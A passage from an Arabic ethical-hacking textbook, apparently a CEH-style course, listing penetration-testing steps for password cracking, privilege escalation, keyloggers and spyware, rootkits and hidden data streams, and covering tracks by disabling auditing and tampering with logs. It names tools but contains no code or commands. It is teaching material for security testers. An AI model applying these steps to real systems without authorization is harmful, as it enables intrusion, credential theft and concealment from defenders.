‫ﻓﻲ ﻣﺣﺎوﻟﺔ ﻻﺧﺗراق ﻧظﺎم‪ ،‬اﻟﻣﮭﺎﺟم ﯾﺣﺎول ﻓﻲ اﻟﺑداﯾﺔ ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم‪ ،‬إن وﺟدت‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﺑﻣﺛﺎﺑﺔ إﻧك ﻣﺧﺗﺑر اﺧﺗراق‪ ،‬ﯾﺟب ﻋﻠﯾك‬
‫أﯾﺿﺎ ﻣﺣﺎوﻟﺔ ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم‪ .‬ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪ ،‬اﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :1‬ﺗﺤﺪﯾﺪ ﻧﻈﺎم ﻛﻠﻤﺔ اﻟﺴﺮ اﻟﻤﺤﻤﯿﺔ )‪(Identify password protected systems‬‬
‫اﻟﺗﻌرف ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف اﻟذي ﯾﺣﺗﺎج إﻟﻰ ﺗﻘﯾﯾم أﻣﻧﻰ‪ .‬ﺑﻣﺟرد اﻟﺗﻌرف ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬ﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﻟدﯾك ﺣﻖ اﻟوﺻول إﻟﻰ ﻛﻠﻣﺔ اﻟﻣرور‪،‬‬
‫وھذا ﯾﻌﻧﻲ ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺧزﻧﺔ‪ .‬إذا ﻟم ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﻓﻣﺣﺎول ﺗﻧﻔﯾذ اﻟﻌدﯾد ﻣن اﻟﮭﺟﻣﺎت اﻟﻣﺧﺗﻠﻔﺔ ﻟﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور واﺣدة ﺗﻠو‬
‫اﻷﺧرى ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :2‬ﺗﻨﻔﯿﺬ ھﺠﻮم اﻟﻘﺎﻣﻮس )‪(Perform a dictionary attack‬‬
‫ﺗﻧﻔﯾذ ھﺟوم اﻟﻘﺎﻣوس ﻋن طرﯾﻖ ﺗﺣﻣﯾل ﻣﻠف اﻟﻘﺎﻣوس إﻟﻰ ﺗطﺑﯾﻖ اﻟﻛﺳﯾر واﻟذي ﯾﺗم ﺗﺷﻐﯾﻠﮫ ﺿد ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬ﺗﺷﻐﯾل ﺗطﺑﯾﻖ اﻟﻛﺳر‬
‫وﻣراﻗﺑﺔ اﻟﻧﺗﺎﺋﺞ‪ .‬إذا ﻛﺎن اﻟﺗطﺑﯾﻖ ﺳﻣﺢ ﻟك ﻟﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻧظﺎم‪ ،‬ﻓﮭذا ﯾﻌﻧﻲ أن ﻣﻠف اﻟﻘﺎﻣوس ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﺳر‪ .‬إذا ﻟم ﺗﻛن ﻗﺎدرا‬
‫ﻋﻠﻰ ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻧظﺎم‪ ،‬ﻓﺣﺎول ﻣرة أﺧرى ﻣﻊ ﺗﻘﻧﯾﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور اﻷﺧرى‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :3‬إﺟﺮاء اﻟﺘﺠﺴﺲ ﻋﻠﻰ أﺳﻼك اﻟﺸﺒﻜﺔ )‪(Perform wire sniffing‬‬
‫ﺗﺷﻐﯾل أدوات اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ﻟﻠوﺻول وﺗﺳﺟﯾل ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ اﻟﺧﺎم اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺷﻣل ﻛﻠﻣﺎت اﻟﺳر اﻟﻣرﺳﻠﺔ إﻟﻰ‬
‫اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :4‬ﺗﻨﻔﯿﺬ اﻟﮭﺠﻮم اﻟﻘﺎﺋﻢ ﻋﻠﻰ ﻗﻮاﻋﺪ )‪(Perform a rule-based attack‬‬
‫ﻣﺣﺎوﻟﺔ اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ إﺟراء اﻟﮭﺟوم اﻟﻣﺳﺗﻧد إﻟﻰ اﻟﻘﺎﻋدة‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :5‬ﺗﻨﻔﯿﺬ ھﺠﻮم اﻟﻤﻘﻄﻊ )‪(Perform a syllable attack‬‬
‫ﻣﺣﺎوﻟﺔ اﺳﺗﺧراج ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ إﺟراء ھﺟوم ‪ .syllable‬ھذا اﻟﮭﺟوم ھو ﻣزﯾﺞ ﻣن ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ )‪(brute force attack‬‬
‫وھﺟوم اﻟﻘﺎﻣوس)‪. (dictionary attack‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪486‬‬

‫‪ -‬اﻟﺨﻄﻮة ‪ :6‬ﺗﻨﻔﯿﺬ اﻟﮭﺠﻮم اﻟﮭﺠﯿﻦ )‪(Perform a hybrid attack‬‬


‫ﺣﺎول ﺗﻧﻔﯾذ ھﺟوم اﻟﮭﺟﯾن‪ .‬ﯾﺳﺗﺧدم ھذا اﻟﮭﺟوم ﻟﻠﻌﺛور ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ھﻲ ﻛﻠﻣﺔ اﻟﻘﺎﻣوس ﻣﻊ ﺗرﻛﯾﺑﺎت ﻣن اﻷﺣرف اﻟﻣرﻓﻘﺔ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :7‬ﺗﻨﻔﯿﺬ ھﺠﻮم اﻟﻘﻮة اﻟﻐﺎﺷﻤﺔ )‪(Perform a brute force attack‬‬
‫ﯾﺟب أن ﺗﺣﺎول ﻛل ﺗرﻛﯾﺑﺔ ﻣﻣﻛﻧﺔ ﻣن اﻷﺣرف ﺣﺗﻰ ﯾﺗم اﻟﻌﺛور ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :8‬ﺗﻨﻔﯿﺬ ھﺠﻮم رﺟﻞ ﻓﻲ اﻟﻮﺳﻂ )‪(Perform a man-in-the-middle attack‬‬
‫ﻣﺣﺎوﻟﺔ ﻟﻠﺣﺻول ﻋﻠﻰ اﻟوﺻول إﻟﻰ ﻗﻧوات اﺗﺻﺎل ﺑﯾن اﻟﺿﺣﯾﺔ واﻟﺧﺎدم ﻻﺳﺗﺧراج اﻟﻣﻌﻠوﻣﺎت‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :9‬ﺗﻨﻔﯿﺬ ﻋﻤﻠﯿﺔ ﺗﺨﻤﯿﻦ ﻛﻠﻤﺔ اﻟﺴﺮ )‪(Perform password guessing‬‬
‫ﻣﺣﺎوﻟﺔ ﻟﺗﺧﻣﯾن ﺗوﻟﯾﻔﺎت ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ وﺗطﺑﯾﻘﮭﺎ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :10‬ﺗﻨﻔﯿﺬ ھﺠﻤﺎت ﺗﺮوﺟﺎن‪/‬اﻟﺘﺠﺴﺲ‪/‬ﻛﯿﻠﻮﺟﺮز )‪(Perform Trojans Spyware/Keyloggers‬‬
‫اﺳﺗﺧدام اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ أو اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل اﻟﺗروﺟﺎن ‪ /‬اﻟﺗﺟﺳس ‪ /‬ﻛﯾﻠوﺟرز ﻟﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :11‬ﺗﻨﻔﯿﺬ ھﺠﻮم ﺣﻘﻦ اﻟﮭﺎش )‪(Perform Hash Injection Attack‬‬
‫ﺣﻘن اﻟﮭﺎش اﻟﻣﺧﺗرق ﻓﻲ اﻟﺟﻠﺳﺔ اﻟﻣﺣﻠﯾﺔ واﺳﺗﺧدام اﻟﮭﺎش ﻟﻠﺗﺣﻘﻖ ﻣن ﺻﺣﺔ ﻣوارد اﻟﺷﺑﻛﺔ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :12‬ﺗﻨﻔﯿﺬ ھﺠﻮم رﻧﺒﻮ )‪(Perform a rainbow attack‬‬
‫اﺳﺗﺧدام ﺟدول ‪rainbow‬اﻟذي ﯾﺧزن اﻟﮭﺎﺷﺎت اﻟﻣﺣﺳوﺑﺔ ﻣﺳﺑﻘﺎ ﻟﻛﺳر ھﺎش ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :13‬ﺗﻨﻔﯿﺬ ھﺠﻮم ﺗﻮزﯾﻊ اﻟﺸﺒﻜﺔ )‪(Perform a distributed network attack‬‬
‫اﺳﺗﻌﺎدة ﻛﻠﻣﺔ ﻣرور اﻟﻣﻠﻔﺎت اﻟﻣﺣﻣﯾﺔ ﺑﺎﺳﺗﺧدام ﻗوة اﻟﻣﻌﺎﻟﺞ اﻟﻐﯾر ﻣﺳﺗﺧدﻣﺔ ﻣن اﻵﻻت ﻋﺑر اﻟﺷﺑﻛﺔ ﻟﻔك ﺗﺷﻔﯾر اﻟﻛﻠﻣﺎت‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :14‬ﺗﻨﻔﯿﺬ اﻟﮭﺎش اﻟﻤﺤﺴﻮﺑﺔ ﻣﺴﺒﻘﺎ )‪(Perform pre-computed hashes‬‬
‫اﺳﺗﺧدام اﻟﮭﺎش اﻟﻣﺣﺳوﺑﺔ ﻣﺳﺑﻘﺎ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :15‬ﺗﻨﻔﯿﺬ اﻟﺘﻨﻘﯿﺐ ﻓﻲ اﻟﻘﻤﺎﻣﺔ )‪(Perform dumpster diving‬‬
‫اﻟﺗﺣﻘﻖ ﻣن ﻗﻣﺎﻣﺔ اﻟﮭدف ﻟﻠﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﯾوﺟد ﻛﻠﻣﺎت اﻟﺳر اﻟﺳرﯾﺔ ﻓﻲ أي ﻣﻛﺎن‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :16‬ﺗﻨﻔﯿﺬ اﻟﮭﻨﺪﺳﺔ اﻻﺟﺘﻤﺎﻋﯿﺔ )‪(Perform social engineering‬‬
‫اﺳﺗﺧدام ﺗﻘﻧﯾﺔ اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ﻟﻠﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :17‬إﺟﺮاء اﻟﺘﺠﺴﺲ )‪(Perform shoulder surfing‬‬
‫ﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﯾﻣﻛن ﺳرﻗﺔ ﻛﻠﻣﺔ اﻟﻣرور ﺑﺎﺳﺗﺧدام ‪.shoulder surfing‬‬

‫‪Privilege Escalation‬‬

‫ﺑﻣﺟرد ﺣﺻول اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﻛﻠﻣﺎت ﻣرور اﻟﻧظﺎم‪ ،‬ﻓﺎﻧﮫ ﺳوف ﯾﺣﺎول ﺗﺻﻌﯾد اﻣﺗﯾﺎزاﺗﮫ إﻟﻰ ﻣﺳﺗوى اﻟﻣﺳؤول ﺑﺣﯾث ﯾﻣﻛن ﺗﺛﺑﯾت اﻟﺑراﻣﺞ أو‬
‫اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﺑﺈﻣﻛﺎﻧﮫ اﺳﺗرﺟﺎع اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﻣن اﻟﻧظﺎم‪ .‬ﺑﻣﺛﺎﺑﺔ إﻧك ﻣﺧﺗﺑر اﺧﺗراق‪ ،‬ﯾﺟب ﻋﻠﯾك‬
‫اﺧﺗراق اﻟﻧظﺎم ﻛﻣﺳﺗﺧدم ﻋﺎدي ﺛم ﻣﺣﺎوﻟﺔ ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات اﻟﺧﺎﺻﺔ ﺑك‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ اﻟﺧطوات ﻟﺗﻧﻔﯾذ ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎز‪:‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :1‬ﺣﺎول ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﺑﺎﺳﺘﺨﺪام أﺳﻤﺎء اﻟﻤﺴﺘﺨﺪﻣﯿﻦ اﻟﺘﻲ ﺗﻢ ﺗﻌﺪادھﺎ وﻛﻠﻤﺎت اﻟﻤﺮور اﻟﺘﻲ ﺗﻢ ﻛﺴﺮھﺎ‬
‫ﺑﻣﺟرد ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪ ،‬ﺣﺎول ﺗﺳﺟﯾل اﻟدﺧول ﺑﺎﺳﺗﺧدام ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن أﺟل اﻟوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬اﻟﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن‬
‫ﯾﺗم ﺗﻘﯾﯾد اﻣﺗﯾﺎزات ﺗﺳﺟﯾل اﻟدﺧول‪ .‬إذا ﻛﺎن اﻟﺟواب ﺑﻧﻌم‪ ،‬ﻓﺣﺎول ﺗﺷﻐﯾل اﻟﺧدﻣﺎت واﻟﺣﺳﺎﺑﺎت اﻟﻣﺣروﻣﺔ ﻣن اﻻﻣﺗﯾﺎزات‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :2‬ﺣﺎول ﺗﺸﻐﯿﻞ اﻟﺨﺪﻣﺎت وﺣﺴﺎﺑﺎت اﻟﻤﺤﺮوﻣﯿﻦ )‪(unprivileged account‬‬
‫ﻗﺑل ﻣﺣﺎوﻟﺔ ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات اﻟﺧﺎﺻﺔ ﺑك‪ ،‬ﺣﺎول ﺗﺷﻐﯾل اﻟﺧدﻣﺎت وﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﻟدﯾك أذوﻧﺎت ﻟﺗﺷﻐﯾل اﻟﺧدﻣﺎت أم ﻻ‪ .‬إذا ﻛﻧت ﺗﺳﺗطﯾﻊ‬
‫ﺗﺷﻐﯾل اﻟﺧدﻣﺎت‪ ،‬ﺛم اﺳﺗﺧدام أدوات ﺗﺻﻌﯾد اﻣﺗﯾﺎز ﻟﻠﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎزات رﻓﯾﻌﺔ اﻟﻣﺳﺗوى‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :3‬اﺳﺘﺨﺪام أدوات ﺗﺼﻌﯿﺪ اﻻﻣﺘﯿﺎزات‬
‫اﺳﺗﺧدام أدوات ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎز ﻣﺛل ‪،Offline NT Password Registry Editor ،Active@ Password Changer‬‬
‫‪،Elcomsoft System Recovery ،Windows Password Recovery Tool ،Windows Password Reset Kit‬‬
‫‪ ،Windows Password Recovery Bootdisk ،Trinity Rescue Kit‬اﻟﺦ‪ .‬ھذه اﻷدوات ﺳوف ﺗﺳﺎﻋدك ﻋﻠﻰ ﻛﺳب اﻣﺗﯾﺎزات‬
‫ذات ﻣﺳﺗوى أﻋﻠﻰ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪487‬‬

‫‪Executing Application‬‬

‫ﻣﺧﺗﺑر اﻻﺧﺗراق ﯾﺟب ﻋﻠﯾﮫ ﻓﺣص أﻧظﻣﺔ اﻟﮭدف ﻋن طرﯾﻖ ﺗﻧﻔﯾذ ﺑﻌض اﻟﺗطﺑﯾﻘﺎت ﻣن أﺟل ﻣﻌرﻓﺔ اﻟﺛﻐرات اﻟﻣوﺟودة ﻓﻲ اﻟﻧظﺎم‪ .‬ﻓﯾﻣﺎ ﯾﻠﻲ‬
‫اﻟﺧطوات ﻟﻠﺗﺣﻘﻖ ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻋﻧد اﺧﺗﯾﺎر ﺑﻌض اﻟﺗطﺑﯾﻘﺎت ﻟﯾﺗم ﺗﻧﻔﯾذھﺎ ﻟﺗﺣدﯾد اﻟﺛﻐرات‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :1‬اﻟﺘﺤﻘﻖ ﻣﻦ ﺗﺜﺒﯿﺖ ﻣﻜﺎﻓﺢ اﻟﻔﯿﺮوﺳﺎت ﻋﻠﻰ اﻟﻨﻈﺎم اﻟﮭﺪف‬
‫اﻟﺗﺣﻘﻖ ﻣﺎ إذا ﺗم ﺗﺛﺑﯾت ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف وإذا ﻛﺎﻧت ﻣﺛﺑﺗﺔ‪ ،‬اﻟﺗﺣﻘﻖ ﻣن أﻧﮭﺎ ﻣﺣدﺛﮫ ﻟﺗﺎرﯾﺦ اﻟﯾوم أم ﻻ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :2‬اﻟﺘﺤﻘﻖ ﻣﻦ ﺗﺜﺒﯿﺖ ﺟﺪار ﺣﻤﺎﯾﺔ واﻟﺒﺮاﻣﺞ اﻟﻤﻀﺎدة ‪Keylogging‬ﻋﻠﻰ اﻟﻨﻈﺎم اﻟﮭﺪف‬
‫اﻟﺗﺣﻘﻖ ﻣﺎ إذا ﺗم ﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﺟدار اﻟﺣﻣﺎﯾﺔ وﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ ال ‪ Keylogging‬أم ﻻ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :3‬اﻟﺘﺤﻘﻖ ﻣﻦ ﻧﻈﺎم اﻷﺟﮭﺰة‬
‫ﻣﻌرﻓﺔ ﻣﺎ إذا ﻛﺎن ﯾﺗم ﺗﺄﻣﯾن اﻷﺟﮭزة ﻓﻲ ﺑﯾﺋﺔ ﻣؤﻣﻧﺔ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :4‬اﺳﺘﺨﺪام ﻛﯿﻠﻮﺟﺮز‬
‫ﻣﺣﺎوﻟﺔ ﺗﺛﺑﯾت واﺳﺗﺧدام ﻛﯾﻠوﺟرز ﻋﻠﻰ اﻟﻧظﺎم ﻣن أﺟل ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ .‬اﺳﺗﺧدام ﺗطﺑﯾﻘﺎت ﻛﯾﻠوﺟرز ﻣﺛل ‪،Spytech SpyAgent‬‬
‫‪ ،Advanced Keylogger ،Powered Keylogger ،All In One Keylogger‬اﻟﺦ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :5‬اﺳﺘﺨﺪام ‪spyware‬‬
‫ﺣﺎول ﺗﺛﺑﯾت واﺳﺗﺧدام ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﻧظﺎم ﻣن أﺟل رﺻد اﻷﻧﺷطﺔ ﻋﻠﻰ اﻟﻧظﺎم‪ .‬اﺳﺗﺧدام ﺑراﻣﺞ اﻟﺗﺟﺳس ﻣﺛل ‪SoftActivity TS‬‬
‫‪ ،SPYPhone GOLD ،Mobile Spy ،WebCam Recorder ،Spy Voice Recorder ،Monitor‬اﻟﺦ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :6‬اﺳﺘﺨﺪام أدوات ﻟﻠﺘﻨﻔﯿﺬ ﻋﻦ ﺑﻌﺪ‬
‫ﻣﺣﺎوﻟﺔ ﺗﺛﺑﯾت واﺳﺗﺧدام أدوات ﻟﻠﺗﻧﻔﯾذ ﻋن ﺑﻌد‪.‬‬

‫‪Hiding Files‬‬

‫اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺗﺛﺑت ‪ rootkits‬ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول اﻟﺧﻔﻲ ﻟﻠﻧظﺎم‪ .‬ﯾﺟب ﻋﻠﯾك اﺗﺑﺎع ﺧطوات ﻣﺧﺗﺑر اﻻﺧﺗراق ﻟﻠﻛﺷف ﻋن اﻟﻣﻠﻔﺎت اﻟﻣﺧﻔﯾﺔ‬
‫ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :1‬ﺗﺜﺒﯿﺖ ‪rootkit‬‬
‫أوﻻ ﺣﺎول ﺗﺛﺑﯾت ‪ rootkit‬ﻓﻲ اﻟﻧظﺎم اﻟﻣﺳﺗﮭدف ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول اﻟﺧﻔﻲ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :2‬ﺗﻨﻔﯿﺬ ﺗﻘﻨﯿﺎت اﻟﻜﺸﻒ اﻟﻘﺎﺋﻢ ﻋﻠﻰ اﻟﺴﻼﻣﺔ )‪(Perform integrity-based Detection techniques‬‬
‫ﻗم ﺑﺗﻧﻔﯾذ اﻟﻛﺷوﻓﺎت اﻟﺗﺎﻟﯾﺔ‪،cross-view-based detection ،signature-based detection ،integrity-based detection :‬‬
‫‪ heuristic detection techniques‬ﻟﻠﻛﺷف ﻋن ‪.rootkit‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :3‬اﺳﺘﺨﺪام ﺑﺮاﻣﺞ ﻣﻜﺎﻓﺤﺔ ‪rootkits‬‬
‫اﺳﺗﺧدام ‪ anti-rootkits‬ﻣﺛل ‪ ،Rootkit Buster ،Virus Removal Tool ،UnHackMe ،Stinger‬وﻣﺎ إﻟﻰ ذﻟك ﻟﻛﺷف ﻋن‬
‫‪.rootkits‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :4‬اﺳﺘﺨﺪام )‪NTFS Alternate Data Streams (ADSs‬‬
‫اﺳﺗﺧدام )‪ NTFS Alternate Data Streams (ADSs‬ﻟﺣﻘن اﻟﺷﯾﻔرات اﻟﺧﺑﯾﺛﺔ ﻋﻠﻰ ﻧظﺎم اﻟﻣﺧﺗرق وﺗﻧﻔﯾذه دون أن ﯾﺗم اﻛﺗﺷﺎﻓﮭﺎ ﻣن‬
‫ﻗﺑل اﻟﻣﺳﺗﺧدم‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :5‬اﺳﺗﺧدام‪NTFS stream detectors‬‬
‫اﺳﺗﺧدام ‪ NTFS stream detectors‬ﻣﺛل ‪ ،Streams ،ADS spy ،StreamArmor‬وﻣﺎ إﻟﻰ ذﻟك ﻟﻛﺷف ﻋن ‪.NTFS-ADS streams‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :6‬اﺳﺘﺨﺪام ﺗﻘﻨﯿﺔ إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت‬
‫اﺳﺗﺧدام ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ داﺧل رﺳﺎﻟﺔ ﻋﺎدﯾﺔ واﺳﺗﺧراﺟﮭﺎ ﻓﻲ اﻟوﺟﮭﺔ ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳرﯾﺔ اﻟﺑﯾﺎﻧﺎت‪.‬‬
‫اﻟﺧطوة ‪ :7‬اﺳﺗﺧدام اﻟﻛﺷف ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‬
‫اﺳﺗﺧدام أدوات اﻟﻛﺷف ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻣﺛل ‪،Stego Suite ،Xstegsecret ،Gargoyle Investigator” Forensic Pro‬‬
‫‪ ،Stegdetect‬وﻣﺎ إﻟﻰ ذﻟك ﻷداء ‪.Steganalysis‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪488‬‬

‫‪Covering Tracks‬‬

‫ﯾﺟب ﻋﻠﻰ ﻣﺧﺗﺑر اﻻﺧﺗراق ﺗﻐطﯾﺔ اﻟﻣﺳﺎرات وذﻟك ﻣن ﺧﻼل ﻣﺣﺎﻛﺎة ھﺟوم ﻹﺟراء اﺧﺗﺑﺎر اﻻﺧﺗراق‪ .‬ﻟﻠﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﯾﻣﻛن ﺗﻐطﯾﺔ ﻣﺳﺎرات‬
‫اﻟﻧﺷﺎط اﻟﺧﺎص ﺑك‪ ،‬ﻧﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :1‬إزاﻟﺔ ﻣﺴﺎرات اﻟﻨﺸﺎط ﻋﻠﻰ ﺷﺒﻜﺔ اﻹﻧﺘﺮﻧﺖ‬
‫أوﻻ‪ ،‬إزاﻟﺔ ﻣﺳﺎرات اﻟﻧﺷﺎط ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل ‪ ،MRU‬اﻟﻛوﻛﯾز‪ ،temporary files ،cache ،‬و‪.history‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :2‬ﺗﻌﻄﯿﻞ اﻟﺘﺪﻗﯿﻖ )‪(audit‬‬
‫ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﻌطﯾل اﻟﺗدﻗﯾﻖ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺗﻲ ﺗﺳﺗﮭدﻓﮭﺎ‪ .‬ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑذﻟك ﺑﺎﺳﺗﺧدام أدوات ﻣﺛل‪. Auditpol‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :3‬اﻟﻌﺒﺚ ﻣﻊ ﻣﻠﻔﺎت اﻟﺴﺠﻞ‬
‫ﻣﺣﺎوﻟﺔ ﻟﻠﻌﺑث ﻣﻊ ﻣﻠﻔﺎت اﻟﺳﺟل ﻣﺛل ‪ proxy log files ،server log files ،event log files‬ﻣﻊ ‪ log poisoning‬او ‪.log flooding‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :4‬اﺳﺘﺨﺪام أدوات ﺗﻐﻄﯿﺔ اﻟﻤﺴﺎرات‬
‫اﺳﺗﺧدام أدوات ﺗﻐطﯾﺔ اﻟﻣﺳﺎر ﻣﺛل‪ ،Clear My History ،Tracks Eraser Pro ،Wipe ،MRU-Blaster ، CCleaner‬اﻟﺦ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :5‬ﺣﺎول ﻏﻠﻖ ﻛﺎﻓﺔ اﻻﺗﺼﺎﻻت ﻋﻦ ﺑﻌﺪ إﻟﻰ اﻟﺠﮭﺎز اﻟﻀﺤﯿﺔ‬
‫‪ -‬اﻟﺨﻄﻮات ‪ :6‬ﺣﺎول ﻏﻠﻖ أي ﻣﻦ اﻟﻤﻨﺎﻓﺬ اﻟﻤﻔﺘﻮﺣﺔ‬

‫ﺑﺣول ﷲ ﺗﻌﺎﻟﻰ ﻗد اﻧﺗﮭﯾﻧﺎ ﻣن اﻟوﺣدة اﻟﺧﺎﻣﺳﺔ‪ ،‬وﻻ ﺗﻧﺳوﻧﺎ ﺑﺻﺎﻟﺢ اﻟدﻋﺎء‪.‬‬

‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬

You might also like